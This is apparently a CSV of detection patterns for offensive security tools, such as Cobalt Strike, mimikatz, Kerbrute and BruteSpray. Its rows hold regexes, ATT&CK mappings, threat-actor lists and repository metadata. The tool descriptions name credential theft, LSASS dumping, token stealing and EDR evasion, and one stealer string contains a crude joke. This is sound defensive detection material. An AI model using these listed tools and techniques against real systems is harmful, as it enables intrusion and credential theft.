"*Brutesploit.git*",".{0,1000}Brutesploit\.git.{0,1000}","offensive_tool_keyword","BruteSploit","BruteSploit is a collection of method for automated Generate. Bruteforce and Manipulation wordlist with interactive shell. That can be used during a penetration test to enumerate and maybe can be used in CTF for manipulation.combine.transform and permutation some words or file text","T1110","N/A","N/A","N/A","Exploitation tool","https://github.com/screetsec/BruteSploit","1","1","N/A","N/A","N/A","8","741","263","2020-04-05T00:29:26Z","2017-05-31T17:00:51Z","36306"
"*BruteSploit/wlist/*",".{0,1000}BruteSploit\/wlist\/.{0,1000}","offensive_tool_keyword","BruteSploit","BruteSploit is a collection of method for automated Generate. Bruteforce and Manipulation wordlist with interactive shell. That can be used during a penetration test to enumerate and maybe can be used in CTF for manipulation.combine.transform and permutation some words or file text","T1110","N/A","N/A","N/A","Exploitation tool","https://github.com/screetsec/BruteSploit","1","1","N/A","N/A","N/A","8","741","263","2020-04-05T00:29:26Z","2017-05-31T17:00:51Z","36307"
"*brutespray -*",".{0,1000}brutespray\s\-.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline seperated JSONS and automatically brute-forces services with default credentials using Medusa. BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","0","N/A","N/A","10","10","2231","405","2025-04-21T03:17:20Z","2017-04-05T17:05:10Z","36308"
"*brutespray.exe*",".{0,1000}brutespray.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline seperated JSONS and automatically brute-forces services with default credentials using Medusa. BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","1","N/A","N/A","10","10","2231","405","2025-04-21T03:17:20Z","2017-04-05T17:05:10Z","36309"
"*brutespray.go*",".{0,1000}brutespray\.go.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline seperated JSONS and automatically brute-forces services with default credentials using Medusa. BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","1","N/A","N/A","10","10","2231","405","2025-04-21T03:17:20Z","2017-04-05T17:05:10Z","36310"
"*brutespray/brute*",".{0,1000}brutespray\/brute.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline seperated JSONS and automatically brute-forces services with default credentials using Medusa. BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","1","N/A","N/A","10","10","2231","405","2025-04-21T03:17:20Z","2017-04-05T17:05:10Z","36311"
"*brutespray-output*",".{0,1000}brutespray\-output.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline seperated JSONS and automatically brute-forces services with default credentials using Medusa. BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","0","#filehash","N/A","10","10","2231","405","2025-04-21T03:17:20Z","2017-04-05T17:05:10Z","36312"
"*BruteStager.csproj*",".{0,1000}BruteStager\.csproj.{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/cobbr/Covenant","1","1","N/A","N/A","10","10","4363","783","2024-07-18T17:25:35Z","2019-02-07T15:55:18Z","36313"
"*BruteStager.sln*",".{0,1000}BruteStager\.sln.{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/cobbr/Covenant","1","1","N/A","N/A","10","10","4363","783","2024-07-18T17:25:35Z","2019-02-07T15:55:18Z","36314"
"*bruteuser.go*",".{0,1000}bruteuser\.go.{0,1000}","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110.003 - T1558.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","N/A","10","10","2872","438","2024-08-20T10:56:06Z","2019-02-03T18:21:17Z","36315"
"*bruteuserCmd*",".{0,1000}bruteuserCmd.{0,1000}","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110.003 - T1558.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","N/A","10","10","2872","438","2024-08-20T10:56:06Z","2019-02-03T18:21:17Z","36316"
"*BruteX*",".{0,1000}BruteX.{0,1000}","offensive_tool_keyword","BruteX","Automatically brute force all services running on a target. Open ports. Usernames Passwords","T1110","TA0007 - TA0008 - TA0009","N/A","N/A","Credential Access","https://github.com/1N3/BruteX","1","0","N/A","N/A","10","10","2066","613","2024-08-18T23:18:37Z","2015-06-01T22:28:19Z","36317"
"*bshinject*",".{0,1000}bshinject.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/dcsync/pycobalt","1","1","N/A","N/A","10","10","299","56","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z","36318"
"*bshinject*",".{0,1000}bshinject.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","36319"
"*bshspawn*",".{0,1000}bshspawn.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/dcsync/pycobalt","1","1","N/A","N/A","10","10","299","56","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z","36320"
"*bsteal_token*",".{0,1000}bsteal_token.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/dcsync/pycobalt","1","1","N/A","N/A","10","10","299","56","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z","36321"
"*bsteal_token*",".{0,1000}bsteal_token.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","36322"
"*btpsupport@protonmail.com*",".{0,1000}btpsupport\@protonmail\.com.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","#email","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","36323"
"*BTW i use ARCH. A - Jeffrey Epstein. R - didnt. C - kill. H - himself*",".{0,1000}BTW\si\suse\sARCH\.\sA\s\-\sJeffrey\sEpstein\.\sR\s\-\sdidnt\.\sC\s\-\skill\.\sH\s\-\shimself.{0,1000}","offensive_tool_keyword","PredatorTheStealer","C++ stealer (passwords - cookies - forms - cards - wallets) ","T1078 - T1114 - T1555 - T1539 - T1212 - T1132","TA0006  - TA0010","N/A","N/A","Credential Access","https://github.com/SecUser1/PredatorTheStealer","1","0","N/A","N/A","8","1","11","2","2022-12-06T16:46:33Z","2022-12-06T16:34:43Z","36330"
"*bucketloot -*",".{0,1000}bucketloot\s\-.{0,1000}","offensive_tool_keyword","BucketLoot","BucketLoot is an automated S3-compatible bucket inspector that can help users extract assets- flag secret exposures and even search for custom keywords as well as Regular Expressions from publicly-exposed storage buckets by scanning files that store data in plain-text","T1562.007 - T1119 - T1530","TA0006 - TA0010","N/A","N/A","Discovery","https://github.com/redhuntlabs/BucketLoot","1","0","N/A","N/A","7","5","409","58","2025-01-22T10:48:27Z","2023-07-17T09:06:14Z","36331"
"*bucketloot https://*",".{0,1000}bucketloot\shttps\:\/\/.{0,1000}","offensive_tool_keyword","BucketLoot","BucketLoot is an automated S3-compatible bucket inspector that can help users extract assets- flag secret exposures and even search for custom keywords as well as Regular Expressions from publicly-exposed storage buckets by scanning files that store data in plain-text","T1562.007 - T1119 - T1530","TA0006 - TA0010","N/A","N/A","Discovery","https://github.com/redhuntlabs/BucketLoot","1","0","N/A","N/A","7","5","409","58","2025-01-22T10:48:27Z","2023-07-17T09:06:14Z","36332"
"*bucketloot.exe -*",".{0,1000}bucketloot\.exe\s\-.{0,1000}","offensive_tool_keyword","BucketLoot","BucketLoot is an automated S3-compatible bucket inspector that can help users extract assets- flag secret exposures and even search for custom keywords as well as Regular Expressions from publicly-exposed storage buckets by scanning files that store data in plain-text","T1562.007 - T1119 - T1530","TA0006 - TA0010","N/A","N/A","Discovery","https://github.com/redhuntlabs/BucketLoot","1","0","N/A","N/A","7","5","409","58","2025-01-22T10:48:27Z","2023-07-17T09:06:14Z","36333"
"*bucketloot.exe https://*",".{0,1000}bucketloot\.exe\shttps\:\/\/.{0,1000}","offensive_tool_keyword","BucketLoot","BucketLoot is an automated S3-compatible bucket inspector that can help users extract assets- flag secret exposures and even search for custom keywords as well as Regular Expressions from publicly-exposed storage buckets by scanning files that store data in plain-text","T1562.007 - T1119 - T1530","TA0006 - TA0010","N/A","N/A","Discovery","https://github.com/redhuntlabs/BucketLoot","1","0","N/A","N/A","7","5","409","58","2025-01-22T10:48:27Z","2023-07-17T09:06:14Z","36334"
"*bucketloot-darwin64*",".{0,1000}bucketloot\-darwin64.{0,1000}","offensive_tool_keyword","BucketLoot","BucketLoot is an automated S3-compatible bucket inspector that can help users extract assets- flag secret exposures and even search for custom keywords as well as Regular Expressions from publicly-exposed storage buckets by scanning files that store data in plain-text","T1562.007 - T1119 - T1530","TA0006 - TA0010","N/A","N/A","Discovery","https://github.com/redhuntlabs/BucketLoot","1","1","#linux","N/A","7","5","409","58","2025-01-22T10:48:27Z","2023-07-17T09:06:14Z","36335"
"*bucketloot-freebsd64*",".{0,1000}bucketloot\-freebsd64.{0,1000}","offensive_tool_keyword","BucketLoot","BucketLoot is an automated S3-compatible bucket inspector that can help users extract assets- flag secret exposures and even search for custom keywords as well as Regular Expressions from publicly-exposed storage buckets by scanning files that store data in plain-text","T1562.007 - T1119 - T1530","TA0006 - TA0010","N/A","N/A","Discovery","https://github.com/redhuntlabs/BucketLoot","1","1","N/A","N/A","7","5","409","58","2025-01-22T10:48:27Z","2023-07-17T09:06:14Z","36336"
"*BucketLoot-master*",".{0,1000}BucketLoot\-master.{0,1000}","offensive_tool_keyword","BucketLoot","BucketLoot is an automated S3-compatible bucket inspector that can help users extract assets- flag secret exposures and even search for custom keywords as well as Regular Expressions from publicly-exposed storage buckets by scanning files that store data in plain-text","T1562.007 - T1119 - T1530","TA0006 - TA0010","N/A","N/A","Discovery","https://github.com/redhuntlabs/BucketLoot","1","1","N/A","N/A","7","5","409","58","2025-01-22T10:48:27Z","2023-07-17T09:06:14Z","36337"
"*bucketloot-openbsd64*",".{0,1000}bucketloot\-openbsd64.{0,1000}","offensive_tool_keyword","BucketLoot","BucketLoot is an automated S3-compatible bucket inspector that can help users extract assets- flag secret exposures and even search for custom keywords as well as Regular Expressions from publicly-exposed storage buckets by scanning files that store data in plain-text","T1562.007 - T1119 - T1530","TA0006 - TA0010","N/A","N/A","Discovery","https://github.com/redhuntlabs/BucketLoot","1","1","N/A","N/A","7","5","409","58","2025-01-22T10:48:27Z","2023-07-17T09:06:14Z","36338"
"*bucketloot-windows32.exe*",".{0,1000}bucketloot\-windows32\.exe.{0,1000}","offensive_tool_keyword","BucketLoot","BucketLoot is an automated S3-compatible bucket inspector that can help users extract assets- flag secret exposures and even search for custom keywords as well as Regular Expressions from publicly-exposed storage buckets by scanning files that store data in plain-text","T1562.007 - T1119 - T1530","TA0006 - TA0010","N/A","N/A","Discovery","https://github.com/redhuntlabs/BucketLoot","1","1","N/A","N/A","7","5","409","58","2025-01-22T10:48:27Z","2023-07-17T09:06:14Z","36339"
"*bucketloot-windows64.exe*",".{0,1000}bucketloot\-windows64\.exe.{0,1000}","offensive_tool_keyword","BucketLoot","BucketLoot is an automated S3-compatible bucket inspector that can help users extract assets- flag secret exposures and even search for custom keywords as well as Regular Expressions from publicly-exposed storage buckets by scanning files that store data in plain-text","T1562.007 - T1119 - T1530","TA0006 - TA0010","N/A","N/A","Discovery","https://github.com/redhuntlabs/BucketLoot","1","1","N/A","N/A","7","5","409","58","2025-01-22T10:48:27Z","2023-07-17T09:06:14Z","36340"
"*buffer_overflow.py*",".{0,1000}buffer_overflow\.py.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Reconnaissance","https://github.com/xmendez/wfuzz","1","1","#linux","N/A","9","10","6148","1384","2024-08-18T01:36:10Z","2014-10-22T21:23:49Z","36341"
"*bugch3ck/SharpAltSecIds*",".{0,1000}bugch3ck\/SharpAltSecIds.{0,1000}","offensive_tool_keyword","SharpAltSecIds","Shadow Credentials via altSecurityIdentities - Enables attackers to add altSecurityIdentities entries to an account - linking it to an X.509 certificate for authentication. This allows them to impersonate the targeted account and authenticate using the associated certificate","T1098.003 - T1556.002 - T1078","TA0003 - TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/bugch3ck/SharpAltSecIds","1","1","N/A","N/A","9","1","12","3","2022-05-30T13:50:05Z","2022-05-30T13:40:17Z","36342"
"*-Build $RandomAttackPath*",".{0,1000}\-Build\s\$RandomAttackPath.{0,1000}","offensive_tool_keyword","badazure","BadZure orchestrates the setup of Azure Active Directory tenants populating them with diverse entities while also introducing common security misconfigurations to create vulnerable tenants with multiple attack paths","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tool","https://github.com/mvelazc0/BadZure/","1","0","N/A","N/A","5","5","451","26","2025-04-10T03:20:03Z","2023-05-05T04:52:21Z","36343"
"*Build Evil Lsass Twin*",".{0,1000}Build\sEvil\sLsass\sTwin.{0,1000}","offensive_tool_keyword","EvilLsassTwin","Dumping lsass","T1003 - T1560.001 - T1022 - T1027.002","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin","1","0","N/A","N/A","10","2","151","18","2024-12-23T05:06:31Z","2022-09-13T12:42:13Z","36344"
"*build Freeze.go*",".{0,1000}build\sFreeze\.go.{0,1000}","offensive_tool_keyword","Freeze","Freeze is a payload toolkit for bypassing EDRs using suspended processes. direct syscalls. and alternative execution methods","T1055 - T1055.001 - T1055.003 - T1055.004 - T1055.005 - T1055.006 - T1055.007 - T1055.008 - T1055.012 - T1055.013 - T1055.014 - T1055.015 - T1055.016 - T1055.017 - T1055.018 - T1055.019 - T1055.020 - T1055.021 - T1055.022 - T1055.023 - T1055.024 - T1055.025 - T1112","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/optiv/Freeze","1","0","N/A","N/A","N/A","10","1437","187","2023-08-18T17:25:07Z","2022-09-21T14:40:59Z","36345"
"*build GoStompy.go*",".{0,1000}build\sGoStompy\.go.{0,1000}","offensive_tool_keyword","Stompy","Timestomp Tool to flatten MAC times with a specific timestamp","T1070.006","TA0005","N/A","N/A","Defense Evasion","https://github.com/ZephrFish/Stompy","1","0","N/A","N/A","10","1","46","6","2023-10-15T17:38:23Z","2023-10-14T23:40:32Z","36346"
"*build -o LastenServer*",".{0,1000}build\s\-o\sLastenServer.{0,1000}","offensive_tool_keyword","Lastenzug","Socka4a proxy based on websockets","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","Dispossessor","C2","https://github.com/codewhitesec/Lastenzug","1","0","#linux","N/A","10","10","218","33","2022-10-18T08:55:46Z","2022-07-21T12:57:52Z","36347"
"*build SourcePoint.go*",".{0,1000}build\sSourcePoint\.go.{0,1000}","offensive_tool_keyword","cobaltstrike","SourcePoint is a C2 profile generator for Cobalt Strike command and control servers designed to ensure evasion.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Tylous/SourcePoint","1","0","N/A","N/A","10","10","1109","156","2025-04-16T17:15:04Z","2021-08-06T20:55:26Z","36348"
"*build Supernova.go*",".{0,1000}build\sSupernova\.go.{0,1000}","offensive_tool_keyword","Supernova","securely encrypt raw shellcodes","T1027 - T1055.004 - T1140","TA0002 - TA0005 - TA0042","N/A","N/A","Exploitation tool","https://github.com/nickvourd/Supernova","1","0","N/A","N/A","10","9","829","151","2025-04-18T19:15:22Z","2023-08-08T11:30:34Z","36349"
"*Build with love for POC only*",".{0,1000}Build\swith\slove\sfor\sPOC\sonly.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz strings","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","36350"
"*build ZipExec.go*",".{0,1000}build\sZipExec\.go.{0,1000}","offensive_tool_keyword","ZipExec","A unique technique to execute binaries from a password protected zip","T1560.001 - T1204.002 - T1059.005","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Tylous/ZipExec","1","0","N/A","N/A","9","10","1026","153","2022-07-01T16:25:26Z","2021-10-19T21:03:44Z","36351"
"*build.ps1 -commands * -profile *selfcontained -singlefile*",".{0,1000}build\.ps1\s\-commands\s.{0,1000}\s\-profile\s.{0,1000}selfcontained\s\-singlefile.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Athena","1","0","N/A","N/A","10","10","198","40","2025-02-12T17:13:10Z","2022-01-24T20:44:38Z","36352"
"*build.ps1 -profiles * -commands * -compressed*",".{0,1000}build\.ps1\s\-profiles\s.{0,1000}\s\-commands\s.{0,1000}\s\-compressed.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Athena","1","0","N/A","N/A","10","10","198","40","2025-02-12T17:13:10Z","2022-01-24T20:44:38Z","36353"
